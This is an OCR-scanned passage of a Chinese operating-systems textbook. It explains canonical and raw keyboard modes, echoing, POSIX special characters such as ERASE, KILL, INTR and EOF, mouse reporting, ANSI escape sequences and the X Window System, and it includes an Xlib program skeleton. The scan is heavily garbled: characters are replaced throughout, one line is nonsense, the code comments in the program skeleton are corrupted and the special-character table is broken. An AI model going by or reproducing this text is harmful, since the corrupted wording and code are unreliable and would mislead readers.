并 非 所 有 的 程序 都 想 要 这 么 多 的 细节 ， 它 们 常常 只 想 要 校正 后 的 输 
入 ， 而 不 是 如 何 产 生 它 的 准确 的 序列 。 这 一 认识 导致 了 第 二 种 处 理 方 
法 : 键盘 驱动 程序 处 理 全 部 行内 编辑 ， 并 且 只 将 校正 后 的 行 传送 给 用 户 
EP. 。 第 一 种 处 理 方法 是 面向 字符 的 ; 第 二 种 处 理 方法 是 面向 行 的 。 最 
初 它们 分 别 被 称 为 原始 模式 Craw mode) 和 加 工 模式 〈cooked 





mode) 。POSIX 标 准 使 用 稍 欠 生动 的 术语 规范 模式 (canonical mode) 
来 描述 面向 行 的 模式 。 非 规范 模式 (noncanonical mode) 与 原始 模式 是 
等 价 的 ， 尽 管 终端 行为 的 许多 细节 可 能 被 修改 了 。POSIX 兼 容 的 系统 提 
供 了 若干 库 函 数 ， 支 持 选 择 这 两 种 模式 中 的 一 种 并 且 修 改 许多 参数 。 


如 果 键 盘 处 于 规范 加工) 模式 ， 则 字符 必须 存储 起 来 直到 积累 完 
整 的 一 行 ， 因 为 用 户 随后 可 能 决定 删除 一 行 中 的 一 部 分 。 即 使 键盘 处 于 
原始 模式 ， 程 序 也 可 能 尚未 请 求 输入 ， 所 以 字符 也 必须 缓冲 起 来 以 便 允 
许 用 户 提 前 键入 。 可 以 使 用 专用 的 缓冲 区 ， 或 者 缓冲 区 也 可 以 从 池 中 分 
配 。 前 者 对 提前 键入 提出 了 固定 的 限制 ， 后 者 则 没有 。 当 用 户 在 shell 窗 
口 《Windows 的 命令 行 窗口 ) 中 击 键 并 且 刚 刚 友 出 一 条 尚未 完成 的 命令 
(例如 编译 ) 时 ， 将 引起 尖锐 的 问题 。 后 继 键入 的 字符 必须 被 缓冲 ， 因 
为 shell 还 没有 准备 好 读 它 们 。 那 些 不 允许 用 户 提前 键入 的 系统 设计 者 应 
该 被 涂 柏油 、 粘 羽毛 中 ， 或 者 更 加 严重 的 惩罚 是 ， 强 迫 他 们 使 用 他 们 
自己 设计 的 系统 。 





虽然 键盘 与 监视 器 在 逻辑 上 是 两 个 独立 的 设备 ， 但 是 很 多 用 户 已 经 
习惯 于 看 到 他 们 刚刚 键入 的 字符 出 现在 屏幕 上 。 这 个 过 程 叫 做 回 显 
Cechoing) 。 











当 用 户 正 在 击 键 的 时 候 程序 可 能 正在 写 屏幕 ， 这 一 事实 使 回 显 变 得 
错 综 复 洒 (请 再 一 次 想象 在 shell 窗 口中 击 键 ，。 最 起 码 ， 键 盘 驱 动 程序 
必须 解决 在 什么 地 方 放置 新 键入 的 字符 而 不 被 程序 的 输出 所 履 盖 。 








当 超 过 80 个 字符 必须 在 具有 80 字 符 行 〈 或 茶 个 其 他 数字 ) 的 窗口 中 
显示 时 ， 也 使 回 显 变 得 错综复杂 。 根 据 应 用 程序 ， 折 行 到 下 一 行 可 能 是 
适宜 的 。 茶 些 驱 动 程序 只 是 通过 丢弃 超出 80 列 的 所 有 字符 而 将 每 行 截断 


到 80 个 字符 。 























男 一 个 问题 是 制 表 符 的 处 理 。 通 常 由 驱动 程序 来 计算 光标 当前 定位 
在 什么 位 置 ， 它 既 要 考虑 程序 的 输出 又 要 考虑 回 显 的 输出 ， 并 且 要 计算 
要 回 显 的 正确 的 空格 个 数 。 


现在 我 们 讨论 设备 等 效 性 问题 。 远 辑 上 ， 在 一 个 文本 行 的 结尾 ， 人 
们 需要 一 个 回 车 和 一 个 换行 ， 回 车 使 光标 移 回 到 第 一 列 ， 换 行使 光标 前 
进 到 下 一 行 。 要求 用 户 在 每 一 行 的 结尾 键入 回 车 和 换行 是 不 受 欢 迎 的 。 
这 就 要 求 驱动 程序 将 输入 转化 成 操作 系统 使 用 的 格式 。 在 UNIX 中 ， 
ENTER 键 被 转换 成 一 个 换行 用 于 内 部 存储 ， 而 在 Windows 中 ， 它 被 转换 
成 一 个 回 车 跟随 一 个 换行 。 





如 果 标 准 形式 只 是 存储 一 个 换行 UNIX 约定 ) ， 那 么 回 车 (由 
Enter 键 造成 ) 应 该 转换 为 换行 。 如 果 内 部 格式 是 存储 两 者 (Windows 约 
定 ) ， 那 么 驱动 程序 应 该 在 得 到 回 车 时 生成 一 个 换行 并 且 在 得 到 换行 时 
生成 一 个 回 车 。 不 管 是 什么 内 部 约定 ， 监 视 右 可 能 要 求 换行 和 回 车 两 者 
都 回 显 ， 以 便 正 确 地 更 新 屏幕 。 在 诸如 大 型 计算 机 这 样 的 多 用 户 系 统 
上 ， 不 同 的 用 户 可 能 拥有 不 同类 型 的 终端 连接 到 大 型 计算 机 上 ， 这 惑 要 
求 键盘 驱动 程序 将 所 有 不 同 的 回 车 /换行 组 合 转换 成 内 部 系统 标准 并 且 





安排 好 正确 地 实现 回 显 。 


在 规范 模式 下 操作 时 ， 许 多 输入 字符 具有 特殊 的 含义 。 图 5-35 显 示 
出 了 POSIX 要 求 的 所 有 特殊 字符 。 默 认 的 是 所 有 控制 字符 ， 这 些 控制 字 
符 应 该 不 与 程序 所 使 用 的 文本 输入 或 代码 相 冲 突 ， 但 是 除了 最 后 两 个 以 
外 所 有 字符 都 可 以 在 程序 的 控制 下 修改 。 


f 符 POSIX% 


CTRL-U KILL 
CTRL-V LNEXT 
CTRL-Q START 


CTRL-\ 


CTRL-D 
CTRL-M 


CTRL-J 


图 5-35 在 规范 模式 下 特殊 处 理 的 字符 


































ERASE 字 符 允 许 用 户 删 除 刚刚 键入 的 字符 。 它 通常 是 退 格 符 
(CTRL+H)〉。 它 并 不 洪 加 到 字符 队列 中 ， 而 是 从 队列 中 删除 前 一 个 字 
符 。 它 应 该 被 回 显 为 三 个 字符 的 序列 ， 即 退 格 符 、 空 格 和 退 格 符 ， 以 便 
从 屏幕 上 删除 前 一 个 字符 。 如 果 前 一 个 字符 是 制 表 符 ， 那 么 删除 它 取 决 





于 当 它 被 键入 的 时 候 是 如 何 处 理 的 。 如 果 制 表 符 直接 展开 成 空格 ， 那 么 
就 需要 东 些 额外 的 信息 来 决定 后 退 多 远 。 如 果 制 表 符 本 身 被 存放 在 输入 
队列 中 ， 那 么 就 可 以 将 其 删除 并 且 重 新 输出 整 行 。 在 大 多 数 系统 中 ， 退 
格 只 删除 当前 行 上 的 字符 ， 不 会 删除 回 车 并 且 后 退 到 前 一 行 。 


当 用 户 注 意 到 正在 键入 的 一 行 的 开 涉 有 一 个 错误 时 ， 擦 除 一 整 行 并 
且 从 头 再 来 常常 比较 方便 。KILL 字 符 探 除 一 整 行 。 大 多 数 系统 使 被 控 
除 的 行 从 屏幕 上 消失 ， 但 是 也 有 少数 古老 的 系统 回 显 该 行 并 且 加 上 一 个 
回 车 和 换行 ， 因 为 有 些 用 户 喜 欢 看 到 旧 的 一 行 。 因 此 ， 如 何 回 显 KILL 
是 个 人 喜好 问题 。 与 ERASE 一 样 ，KILL 通 常 也 不 可 能 从 当前 行进 一 步 
回 退 。 当 一 个 字符 块 被 删除 时 ， 如 果 使 用 了 缓冲 ， 那 么 烦 劳 驱 动 程序 将 
缓冲 区 退还 给 缓冲 池 可 能 值得 做 也 可 能 不 值得 做 。 











有 了 时 ERASE 或 KILL 字 符 必须 作为 普通 的 数据 键入 。LNEXT 字 符 用 
作 一 个 转 义 字符 (escape character) 。 在 UNIX 中 ，CTRL+V 是 默认 的 转 
义 字 符 。 例 如 ， 更 加 古老 的 UNIX 系 统 常 常 使 用 @ 作 为 KILL 字 符 ， 但 是 
因特网 邮件 系统 使 用 linda@cs.washington.edu 形 式 的 地 址 。 有 的 人 觉得 
老式 的 约定 更 加 舒服 从 而 将 KILL 重 定义 为 @， 但 是 之 后 又 需要 按 字 面 意 
义 键入 一 个 @ 符 号 到 电子 邮件 地 址 中 。 这 可 以 通过 键入 CTRL+V@ 来 实 
现 。CTRL+V 本 身 可 以 通过 键入 CTRL+V CTRL+V 而 按 字面 意义 键入 。 
看 到 一 个 CTRL+V 之 后 ， 驱 动 程序 设置 一 个 标志 ， 表 示 下 一 字符 免除 特 
殊 处 理 。LNEXT 字 符 本 身 并 不 进入 字符 队列 。 





为 了 让 用 户 阻 止 屏幕 图 像 滚动 出 视线 ， 提 供 了 控制 码 以 便 冻 结 屏幕 
并 且 之 后 重新 开始 滚动 。 在 UNIX 系 统 中 ， 这 些 控制 码 分 别 是 
STOP (CTRL+S) 和 START (CTRL+Q) 。 它 们 并 不 被 存储 ， 只 是 用 来 
设置 或 清除 键盘 数据 结构 中 的 一 个 标志 。 每 当 试 图 输出 时 ， 就 检查 这 个 
标志 。 如 果 标 志 已 设置 ， 则 不 输出 。 通 常 ， 回 显 也 随 程序 输出 一 起 被 抑 
制 |。 


杀 死 一 个 正在 被 调试 的 失控 程序 经 常 是 有 必要 的 ，INTR (DEL) 
和 QUIT (CTRL+\〉 字 符 可 以 用 于 这 一 目的 。 在 UNIX 中 ，DEL 将 
SIGINT 信 号 发 送 到 从 该 键盘 启动 的 所 有 进程 。 实 现 DEL 是 相当 需要 技 
巧 的 ， 因 为 UNIX 从 一 开始 就 被 设计 成 在 同一 时 刻 处 理 多 个 用 户 。 因 
此 ， 在 一 般 情况 下 ， 可 能 存在 多 个 进程 代表 多 个 用 户 在 运行 ， 而 DEL 键 
必须 只 能 向 用 户 自己 的 进程 发 信号 。 困 难 之 处 在 于 从 驱动 程序 获得 信息 
送 给 系统 处 理 信号 的 那 部 分 ， 后 者 毕竟 还 没有 请 求 这 个 信息 。 











CTRL+\ 与 DEL 相 类 似 ， 只 是 它 发 送 的 是 SIGQUIT 信 号 ， 如 末 这 个 
言 写 没 有 被 捕捉 到 或 被 忽略 ， 则 强迫 进行 核心 转 储 。 当 敲 击 这 些 键 中 的 
任意 一 个 键 时 ， 驱 动 程序 应 该 回 显 一 个 回 车 和 换行 并 且 为 了 全 新 的 开始 
而 放 莽 累积 的 全 部 输入 。INTR 的 默认 值 经 常 是 CTRL+C 而 不 是 DEL， 因 
为 许多 程序 针对 编辑 操作 可 互 换 地 使 用 DEL 与 退 格 符 。 














另 一 个 特殊 字符 是 EOF (CTRL+D) 。 在 UNIX 中 ， 它 使 任何 一 个 
针对 该 终端 的 未 完成 的 读 请 求 以 缓冲 区 中 可 用 的 任何 字符 来 满足 ， 即 使 


缓冲 区 是 空 的 。 在 一 行 的 开头 键入 CTRL+D 将 使 得 程序 读 到 0 个 字 节 ， 
按 惯例 该 字符 被 解释 为 文件 结尾 ， 并 且 使 大 多 数 程 序 按照 它们 在 处 理 输 
入 文件 时 过 到 文件 结尾 的 同样 方法 对 其 进行 处 理 。 











2. 鼠 标 软件 


大 多 数 PC 机 具有 一 个 鼠标 ， 或 者 具有 一 个 跟踪 球 ， 跟 踪 球 不 过 是 
丹 在 其 背部 上 的 弓 标 。 一 种 常见 类 型 的 鼠标 在 内 部 具有 一 个 橡皮 球 ， 访 
橡皮 球 通过 鼠标 撒 部 的 一 个 圆 洞 突出 ， 当 鼠标 在 一 个 粗糙 表面 上 移动 时 
橡皮 球 会 随 着 旋转 。 当 橡皮 球 旋转 时 ， 它 与 放置 在 相互 垂直 的 深 轴 上 的 
两 个 橡皮 深 简 相 摩 探 。 东 西方 同 的 运动 导致 平行 于 y 轴 的 深 轴 旋转 ， 南 
北方 同 的 运动 导致 平行 于 x 轴 的 深 轴 旋转 。 


鸡 一 种 流行 的 鼠标 类 型 是 光学 鼠标 ， 它 在 其 底部 朔 备 有 一 个 或 多 个 
发 光 二 极 管 和 光电 探测 器 。 早 期 的 光学 妃 标 必须 在 特殊 的 鼠标 垫上 操 
作 ， 鼠 标 垫 上 刻 有 和 矩形 的 网 格 ， 这 样 眠 标 能 够 计数 罕 过 的 线 数 。 现 代 光 
学 鼠标 在 其 中 有 图 像 处 理 必 片 并 且 获 取 处 于 它们 下 方 的 连续 的 低 分 辨 率 
照片 ， 寻 找 从 图 像 到 图 像 的 变化 。 


当 鼠 标 在 随便 哪个 方向 移动 了 一 个 确定 的 最 小 距离 ， 或 者 按钮 被 按 
下 或 释放 时 ， 都 会 有 一 条 消息 发 送 给 计算 机 。 最 小 距离 大 约 是 
0.1mm《〈 尽 管 它 可 以 在 软件 中 设置 )》 。 有 些 人 将 这 一 单位 称 为 一 个 鼠标 
步 (mickey) 。 鼠 标 可 能 具有 一 个 、 两 个 或 者 三 个 按钮 ， 这 取 雇 于 设计 
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用 低 功 率 无 线 电 ， 例 如 使 用 蓝牙 (Bluetooth) 标准 将 数据 发 送 回 计算 
机 ， 而 有 线 鼠 标 是 通过 导线 将 数据 发 送 回 计算 机 。 





发 送 到 计算 机 的 消 妃 包含 三 个 项 目 ; Ax、Ay、 按 钮 ， 即 自 上 一 次 
消 妃 之 后 x 位 置 的 变化 、 目 上 一 次 消息 之 后 y 位 置 的 变化 、 按 钮 的 状态 。 
消息 的 格式 取决 于 系统 和 鼠标 所 具 有 的 按钮 的 数目 。 通 第 ， 消 轧 占 3 字 
。 大 多 数 鼠 标 返 回报 告 最 多 每 秒 40 次 ， 所 以 鼠标 目 上 一 次 报告 之 后 可 
能 移动 了 多 个 鼠标 步 。 











z 


注意 ， 鼠 标 仅仅 指出 位 置 上 的 变化 ， 而 不 是 绝对 位 置 本 身 。 如 宁 轻 
轻 地 拿 起 鼠标 并 且 轻 轻 地 放下 而 不 导致 橡 皮 球 旋 转 ， 那 么 就 不 会 有 消息 
发 出 。 


某 些 GUI 区 分 单 击 与 双击 鼠标 按钮 。 如 果 两 次 点 击 在 空间 上 《鼠标 
步 ) 足够 接近 ， 并 且 在 时 间 上 《至 秒 ) 也 足够 接近 ， 那 么 就 会 用 出 双击 
信号 。 最 大 的 “足够 接近 ?是 软件 的 事情 ， 并 且 这 两 个 参数 通 癌 是 用 户 可 
设置 的 。 





[1] 原文 为 be tarred and featheted， 是 英国 古代 的 一 种 酷刑 。 受 刑 人 全 身 
涂 上 灼热 的 柏油 (tarred) ， 然 后 将 其 身上 粘 满 羽毛 (feathered) 。 这 
样 ， 羽 毛 当 然 很 难 脱 下 ， 要 脱 下 也 难免 皮肉 之 伤 。be tarred and feathered 


现 用 于 比喻 受到 严厉 惩罚 。 





译 者 注 


5.6.2 ”输出 软件 


下 面 我 们 考虑 输出 软件 。 首 移 我 们 将 讨论 到 文本 窗口 的 简单 输出 ， 
这 是 程序 员 通 党 喜欢 使 用 的 方式 。 然 后 ， 我 们 将 考虑 图 形 用 户 界 面 ， 这 
是 其 他 用 户 经 第 喜欢 使 用 的 。 





1. 文 本 窗口 


当 输 出 是 连续 的 单一 字体 、 大 小 和 颜色 的 形式 时 ， 输 出 比 输入 简 
。 大 体 上 ， 程 序 将 字符 发 送 到 当前 窗口 ， 而 字符 在 那里 显示 出 来 。 通 
常 ， 一 个 字符 块 或 者 一 行 是 在 一 个 系统 调用 中 被 写 到 窗口 上 的 。 


十 


屏幕 编辑 器 和 许多 其 他 复杂 的 程序 需要 能 够 以 更 加 复杂 的 方式 更 新 
屏幕 ， 例 如 在 屏幕 的 中 间 蔡 换 一 行 。 为 满足 这 样 的 需要 ， 大 多 数 输 出 驱 
动 程序 支持 一 系列 命令 来 移动 光标 ， 在 光标 处 插入 或 者 删除 字符 或 行 。 
这 些 命令 常常 被 称 为 转 义 序列 (escape sequence) 。 在 25 行 80 列 ASCII 哑 
终端 的 全 盛 期 ， 有 数 百 种 终端 类 型 ， 每 一 种 都 有 自己 的 转 义 序列 。 因 
而 ， 编 号 在 一 种 以 上 的 终端 类 型 上 工作 的 软件 是 十 分 困难 的 。 








一 种 解决 方案 是 称 为 termcap 的 终端 数据 库 ， 它 是 在 伯克利 UNIX 中 
引入 的 。 该 软件 包 定 义 了 许多 基本 动作 ， 例 如 将 光标 移动 到 《〈 行 ， 
列 ) 。 为 了 将 光标 移动 到 一 个 特殊 的 位 置 ， 软 件 〈 如 一 个 编辑 右 ) 使 用 


一 个 一 般 的 转 义 序列 ， 然 后 该 转 义 序列 被 转换 成 将 要 被 执行 写 操作 的 终 
端的 实际 转 义 序列 。 以 这 种 方式 ， 该 编辑 器 就 可 以 工作 在 任何 具有 
termcap 数 据 库 入 口 的 终端 上 。 许 多 UNIX 软 件 仍 然 以 这 种 方式 工作 ， 即 
使 在 个 人 计算 机 上 。 





逐渐 地 ， 业 界 看 到 了 转 义 序列 标准 化 的 需要 ， 所 以 就 开发 了 一 个 
ANSI 标 准 。 图 5-36 所 示 为 一 些 该 标准 的 取 值 。 












































































































转 义 序列 & X 
ESC [nA 向 上 移动 m 行 
ESC [nB 癌 下 移动 n 行 
ESC [nC | 向 右 移动 a 个 间隔 | 
ESC [nD | 向 左 移动 x 个 间隔 
ESC [m;nH 将 光标 移动 到 Cm, n) 
ESC [sJ 从 光标 清除 屏幕 (0 到 结尾 、1 从 开始 、2 两 者 ) 
ESC [sK 从 光标 清除 行 (0 到 结尾 、1 从 开始 、2 两 者 ) 
ESC [nL 在 光标 处 插入 n 行 
ESC [nM 在 光标 处 删除 n 行 
ESC [nP 在 光标 处 删除 个 字符 了 
ESC [n@ 在 光标 处 插入 n 个 字符 
ESC [nm 允许 再 现 n (0= 常 规 、4= 粗 体 、5= 闪 烁 、7= 反 和 白 ) 
ESC M 如 果 光 标 在 项 行 上 则 向 后 滚动 屏幕 








图 5-36 终端 驱动 程序 在 输出 时 接受 的 ANSI 转 义 序列 。ESC 表 示 
ASCI 转 义 字符 (0x1B) ，nh、m 和 s 是 可 选 的 数值 参数 


下 面 考 处 文本 编辑 器 怎样 使 用 这 些 转 义 序列 。 假 设 用 户 键入 了 一 条 
命令 指示 编辑 器 完全 删除 第 3 行 ， 然 后 封闭 第 2 行 和 第 4 行 之 间 的 间 际 。 


编辑 器 可 以 通过 串 行 线 向 终端 发 送 如 下 的 转 义 序列 : 


ESC [3;1 H ESC [0 K ESC [1 M 











(其 中 在 上 面 使 用 的 空格 只 是 为 了 分 开 符 写 ， 它 们 并 不 传送 ) 。 这 
一 序列 将 光标 移动 到 第 3 行 的 开头 ， 探 除 整 个 一 行 ， 然 后 删除 现在 的 空 
行 ， 使 从 第 4 行 开 始 的 所 有 行 同 上 移动 一 行 。 现 在 ， 第 4 行 变 成 了 第 3 
行 ， 第 5 行 变 成 了 第 4 行 ， 以 此 类 推 。 类 似 的 转 义 序列 可 以 用 来 在 显示 器 
的 中 间 添 加 文本 。 字 和 字符 可 以 以 类 似 的 方式 添加 或 删除 。 








9 多 窗口 系统 


几乎 所有 UNIX 系 统 的 用 户 界 面 都 以 X 窗 口 系统 (X Window 

System) 为 基础 ，X 窗 口 系统 经 常 仅 称 为 X， 它 是 作为 Athena 计 划 趾 的 
一 部 分 于 20 世 纪 80 年 代 在 MIT 开 发 的 。X 窗 口 系 统 具有 非常 好 的 可 移植 
性 ， 并 且 完 全 运行 在 用 户 空间 中 。 人 们 最 初 打 算 将 其 用 于 将 大 量 的 远程 
用 户 终 端 与 中 央 计 算 服务 器 相连 接 ， 所 以 它 在 逻辑 上 分 成 客户 软件 和 主 
机 软件 ， 这 样 就 有 可 能 运行 在 不 同 的 计算 机 上 。 在 现代 个 人 计算 机 上 ， 
两 部 分 可 以 运行 在 相同 的 机 器 上 。 在 Linux 系 统 上 ， 流 行 的 Gnome 和 
KDE 桌 面 环 境 就 运行 在 X 之 上 。 














当 X 在 一 台 机 器 上 运行 时 ， 从 键盘 或 鼠标 采集 输入 并 且 将 输出 写 到 
屏幕 上 的 软件 称 为 X 服 务 器 (X server) 。 它 必须 跟踪 当前 选择 了 哪个 窗 


口 〈《 鼠 标 指 针 所 在 处 ) ， 这 样 它 就 知道 将 新 的 键盘 输入 发 送 给 哪个 客 
户 。 它 与 称 为 X 客 户 《〈X client) 的 运行 中 的 程序 进行 通信 (可 能 通过 网 
络 ) 。 它 将 键盘 与 鼠标 输入 发 送 给 X 客 户 ， 并 且 从 X 客 户 接收 显示 命 


令 。 


X 服 务 器 总 是 位 于 用 户 的 计算 机 内 部 ， 而 X 客 户 有 可 能 在 远方 的 远 
程 计 算 服 务 嚣 上， 这 看 起 来 也 许 有 些 不 可 思议 ， 但 是 X 服 务 器 的 主要 工 
作 是 在 屏幕 上 显示 位 ， 所 以 让 它 靠 近 用 户 是 有 道理 的 。 从 程序 的 观点 来 
看 ， 它 是 一 个 客户 ， 吟 只 服 务 器 做 事情 ， 例 如 显示 文本 和 几何 图 形 。 服 
务 器 〈 在 本 地 PC 中 ) Aree PE ASH, BRAT A ARS ae PT 
做 的 那样 。 








对 于 X 客 户 和 X 服 务 器 在 不 同 机 器 上 的 情形 ， 客 户 与 服务 器 的 布置 
如 图 5-37 所 示 。 但 是 当 在 单一 的 机 器 上 运行 Gnome 或 者 KDE 时 ， 客 户 只 
是 使 用 X 库 与 相同 机 器 上 的 X 服 务 器 进行 会 话 的 某 些 应 用 程序 (但 是 通 
过 套 接 字 使 用 TCP 连 接 ， 与 远程 情形 中 所 做 的 工作 相同 ) 。 


远程 主机 


窗口 管理 器 | 应 用 程序 


用 户 空间 


X 服 务 器 


pe 
内 核 空 间 $: 





图 5-37 MITX 窗 口 系统 中 的 客户 与 服务 器 


在 单机 上 或 者 通过 网 络 在 UNIX 或 其 他 操作 系统 ) 之 上 运行 X 窗 
口 系统 都 是 可 行 的， 其 原因 在 于 X 实 际 上 定义 的 是 X 客 户 与 X 服 务 器 之 间 
的 X 协 议 ， 如 图 5-37 所 示 。 客 户 与 服务 器 是 在 同一 台 机 器 上 ， 还 是 通过 
一 个 局 域 网 阳 开 了 100m， 或 者 是 相距 几 千 公里 并 且 通 过 Internet 相 连接 
都 无 关 紧 要 。 在 所 有 这 些 情况 下 ， 协 议 与 系统 操作 都 是 完全 相同 的 。 








X 只 是 一 个 窗口 系统 ， 它 不 是 一 个 完全 的 GUI。 为 了 获得 完全 的 
GUI， 要 在 其 上 运行 其 他 软件 层 。 一 层 是 Xlib， 它 是 一 组 库 过 程 ， 用 于 
访问 X 的 功能 。 这 些 过 程 形成 了 X 窗 口 系统 的 基础 ， 我 们 将 在 下 面 对 其 
进行 分 机 ， 但 是 这 些 过 程 过 于 原始 了 ， 以 至 于 大 多 数 用 户 程序 不 能 直接 
访问 它们 。 例 如 ， 每 次 鼠标 点 击 是 单独 报告 的 ， 所 以 确定 两 次 点 击 实际 











上 形成 了 双击 必须 在 Xlib 之 上 处 理 。 


为 了 使 得 对 X 的 编程 更 加 容易 ， 作 为 X 的 一 部 分 提供 了 一 个 工具 
包 ， 组 成 了 Intrinsics〈 本 征 函数 集 ) 。 这 一 层 管理 按钮 、 滚 动 条 以 及 其 
他 称 为 窗口 小 部 件 (widget) 的 GUI 元 素 。 为 了 产生 真正 的 GUI 界面 ， 
具有 一 致 的 外 观 与 感觉 ， 还 需要 另外 一 层 软 件 〈 或 者 几 层 软件 ) 。 一 个 
例子 是 Motif， 如 图 5-37 所 示 ， 它 是 Solaris 和 其 他 商业 UNIX 系 统 上 使 用 
的 公共 桌面 环境 (Common Desktop Environment) 的 基础 。 大 多 数 应 用 
程序 利用 的 是 对 Motif 的 调用 ， 而 不 是 对 Xlib 的 调用 。Gnome 和 KDE 具 有 
与 图 5-37 相 类 似 的 结构 ， 只 是 库 有 所 不 同 。Gnome 使 用 GTK+ 库 ，KDE 
使 用 Qt 库 。 拥 有 两 个 GUI 是 否 比 一 个 好 是 有 争议 的 。 





此 外 ， 值 得 注意 的 是 窗口 管理 并 不 是 X 本 身 的 组 成 部 分 。 将 其 遗漏 
的 决策 完全 是 故意 的 。 一 个 单独 的 客户 进程 ， 称 为 窗口 管理 器 
(window manager) ， 控 制 痢 屏幕 上 窗口 的 创建 、 删 除 以 及 移动 。 为 了 
管理 窗口 ， 窗 口 管 理 器 要 发 送 命令 到 X 服 务 器 告诉 它 做 什么 。 窗 口 管理 
器 经 常 运行 在 与 X 客 户 相 同 的 机 器 上 ， 但 是 理论 上 它 可 以 运行 在 任何 地 
方 。 




















这 一 模块 化 设计 ， 包 括 若干 层 和 多 个 程序 ， 使 得 X 高 度 可 移植 和 高 
度 灵 活 。 它 已 经 被 移植 到 UNIX 的 大 多 数 版 本 上 ， 包 括 Solaris、BSD 的 
所 有 派生 版 本 、AIX、Linux 等 ， 这 就 使 得 对 于 应 用 程序 开发 人 员 来 说 在 
多 种 平台 上 拥有 标准 的 用 户 界 面 成 为 可 能 。 它 还 被 移植 到 其 他 操作 系统 








上 。 相 反 ， 在 Windows 中 ， 窗 口 与 GUI 系统 在 GDI 中 混合 在 一 起 并 且 处 
于 内 核 之 中 ， 这 使 得 它们 维护 起 来 十 分 困难 ， 并 且 当 然 是 不 可 移植 的 。 








现在 让 我 们 像 是 从 XIlib 层 观察 那样 来 简略 地 看 一 看 X。 当 一 个 X 程 
序 局 动 时 ， 它 打开 一 个 到 一 个 或 多 个 X 服 务 器 我们 称 它们 为 工作 站 ) 
的 连接 ， 即 使 它们 可 能 与 X 程 友 在 同一 台 机 器 上 。 在 消息 丢失 与 重复 由 
网 络 软件 来 处 理 的 意义 上 ，X 认 为 这 一 连接 是 可 徘 的 ， 并 且 它 不 用 担心 
通信 和 错误。 通常 在 服务 器 与 客户 之 间 使 用 的 是 TCP/IP。 








四 种 类 型 的 消 奶 通过 连接 传递 : 


1) 从 程序 到 工作 站 的 绘图 命令 





2) 工 作 站 对 程序 请 求 的 应 答 。 
3) 键 盘 、 和 鼠标 以 及 其 他 事件 的 通 
4) 错 误 消 息 。 


从 程序 到 工作 站 的 大 多 数 绘图 命令 是 作为 单 癌 消 恩 发 送 的 ， 不 期 望 
应 答 。 这 样 设计 的 原因 是 当 客 户 与 服务 器 进程 在 不 同 的 机 器 上 时 ， 命 令 
到 达 服 务 占 并 且 执 行 要 花费 相当 长 的 时 间 周 期 。 在 这 一 时 间 内 阻 暑 应 用 
程序 将 不 必要 地 降低 其 执行 速度 。 另 一 方面 ， 当 程序 需要 来 自 工 作 站 的 
信息 时 ， 它 只 好 等 得 二 到 应 答 返 回 。 

















与 Windows 类 似 ，X 和 是 高 度 事件 驱动 的 。 事 件 从 工作 站 流 同 程 序 ， 
通常 是 为 啊 应 人 的 茶 些 行动 ， 例 如 键盘 各 击 、 鼠 标 移动 或 者 一 个 窗口 被 
显现 。 每 个 事件 消息 32 个 字 节 ， 第 一 个 字 节 给 出 事件 类 型 ， 下 面 的 31 个 
字 节 提供 附加 的 信息 。 存 在 许多 种 类 的 事件 ， 但 是 发 送 给 一 个 程序 的 只 
有 那些 它 宣 称 愿意 处 理 的 事件 。 例 如 ， 如 果 一 个 程序 不 想 得 知 键 释 放 的 
消息 ， 那 么 键 释放 的 任何 事件 都 不 会 发 送 给 它 。 与 在 Windows 中 一 样 ， 
事件 是 排 成 队列 的 ， 程 序 从 队列 中 该 取 事件 。 然 而 ， 与 Windows 不 同 的 
是 ， 操 作 系统 绝对 不 会 主动 调用 在 应 用 程序 之 内 的 过 程 ， 它 甚 全 不 知道 
哪个 过 程 处 理 哪 个 事件 。 

















XX 中 的 一 个 关键 概念 是 资源 (resource) 。 资 源 是 一 个 保存 一 定 信 息 
的 数据 结构 。 应 用 程序 在 工作 站 上 创建 资源 。 在 工作 站 上 ， 资 源 可 以 在 
多 个 进程 之 间 共 孚 。 资 源 的 存活 期 往往 很 短 ， 并 且 当 工作 站 重新 启动 后 
资源 不 会 继续 存在 。 典 型 的 资源 包括 窗口 、 字 体 、 颜 色 上 映射 〈 调 色 
板 ) 、 像 素 映 射 〈《 位 图 ) 、 光 标 以 及 图 形 上 下 文 。 图 形 上 下 文 用 于 将 属 
性 与 窗口 天 联 起 来 ， 在 概念 上 与 Windows 的 设备 上 下 文 相 类 似 。 








X 程 序 的 一 个 粗略 的 、 不 完全 的 框架 如 图 5-38 所 示 。 它 以 包含 东 些 
必需 的 头 文件 开始 ， 之 后 声明 茶 些 变量 。 然 后 ， 它 与 X 服 务 嚣 连接， 入 
服务 器 是 作为 XOpenDisplay 的 参数 设 定 的 。 接 着 ， 它 分 配 一 个 窗口 资源 
并 且 将 指 疝 该 窗口 资源 的 句柄 存放 在 win 中 。 实 际 上 ， 一 些 初始 化 应 该 
出 现在 这 里 ， 在 初始 化 之 后 X 程 序 通 知 窗口 管理 器 新 窗口 的 存在 ， 因 而 








#include <X11/Xlib.h> 
#include <X11/Xutil.h> 


main(int argc, char *argv[]) 


adie 1 服务 器 标识 符 */ 
earn [> 窗口 标识 符 */ 
an /* 图 形 上 下 文 标识 符 */ 
x 用 于 存储 一 个 圳 件 * 
int running = 1; /* 用 于 存储 一 个 事件 */ 


disp = XOpenDisplay("display_name"),  /* 连 接 到 X 服 务 器 */ 
win = XCreateSimpleWindow(disp，.…); /* 为 新 窗口 分 配 内 存 */ 
XSetStandardProperties(disp, ...); /* 向 窗口 管理 器 宣布 窗口 */ 

gc = XCreateGC(disp, win, 0, 0); m Gilat VIB EK xe */ 
XSelectinput(disp, win, ButtonPressMask | KeyPressMask | ExposureMask); 


XMapRaised(disp, win); /显示 窗口 ; 发 送 Expose 事 件 */ 


while (running) { 
XNextEvent(disp, &event);  /* 获得 下 一 个 事件 */ 
switch (event.type) { ea acer oe 
case Expose: „yo break; /* Bex f0 */ 
case ButtonPress: ...; break; /* 处 理 鼠 标点 击 */ 
case Keypress: …; break;  /* 处 理 键盘 输入 */ 


} 

* EL hy A 上 Cy" k 
XFreeGC(disp, gc); I= 放 图 形 上 下 文 " ‘ 
XDestroyWindow(disp, win); /* 回收 窗口 的 内 存 空间 */ 
XCloseDisplay(disp); /* PREK HE BE */ 





图 5-38 XX 窗口 应 用 程序 的 框架 





对 XCreateGC 的 调用 创建 一 个 图 形 上 上 下文， 窗口 的 属性 就 存放 在 图 
形 上 下 文中 。 在 一 个 更 加 复杂 的 程序 中 ， 窗 口 的 属性 应 该 在 这 里 被 初始 
